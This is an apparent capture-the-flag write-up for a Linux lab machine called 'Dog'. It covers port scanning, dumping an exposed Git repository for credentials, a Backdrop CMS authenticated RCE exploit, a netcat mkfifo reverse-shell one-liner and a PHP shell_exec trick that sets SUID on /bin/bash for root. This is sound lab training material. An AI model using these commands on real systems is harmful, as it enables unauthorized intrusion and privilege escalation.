Summary
Dog is a Linux machine that was released on 08 Mar 2025, that focuses on foundational enumeration and exploitation techniques.
Write-up
Let do a quick nmap to scan for open ports
sudo nmap -sCV -p- -T4 -oN nmap_dog <IP>
We can see that a web server is running on port 80 and a Git repository is present. The robots.txt file also discloses some directories. After further investigation, I found that the version of Backdropcms is 1.27.1, located at http://<IP>/core/profiles/testing/testing.info.
Version 1.27.1 is vulnerable to Authenticated Remote Command Execution (RCE), as documented at https://www.exploit-db.com/exploits/52021. Now, let’s hunt for a valid credentials.
Browsing the website I found these 2 potential usernames.
Let’s move on to the Git repository. We will use this tool to download the repository: https://github.com/arthaud/git-dumper.
After you finish downloading the repository, I recommend opening the folder in VS Code. This will improve readability and searchability.
This could be the password we are looking for. Let’s see if we can find any other usernames. Based on the support account, we can use @dog.htb as the search string.
And voilĂ , tiffany:Ba************024 is a valid credential. Now, let’s follow the instructions of the exploit to obtain a webshell. Remember to compress it into a .tar file.
We will use this command to obtain a reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <PORT> >/tmp/fNote: You need to be quick, as the web server will delete the module after a few minutes.
Looking at the /etc/passwd we found two new usernames jobert and johncusack
We’re unable to progress further, so let’s try reusing the password Ba**********024 for other users. And indeed, johncusack:Ba*********024 works.
sudo -l and we found an interesting binary:
Checking the status we got this error:
The application is running at /var/www/html
Notice this function:
Let put this script in the /tmp and call it
<?php
$output = shell_exec('ls');
echo "<pre>$output</pre>";
?>
Now let modify the script as follow:
<?php
$output = shell_exec('chmod +s /bin/bash');
echo "<pre>$output</pre>";
?>
Now call it with /bin/bash -p to get root and read the flag
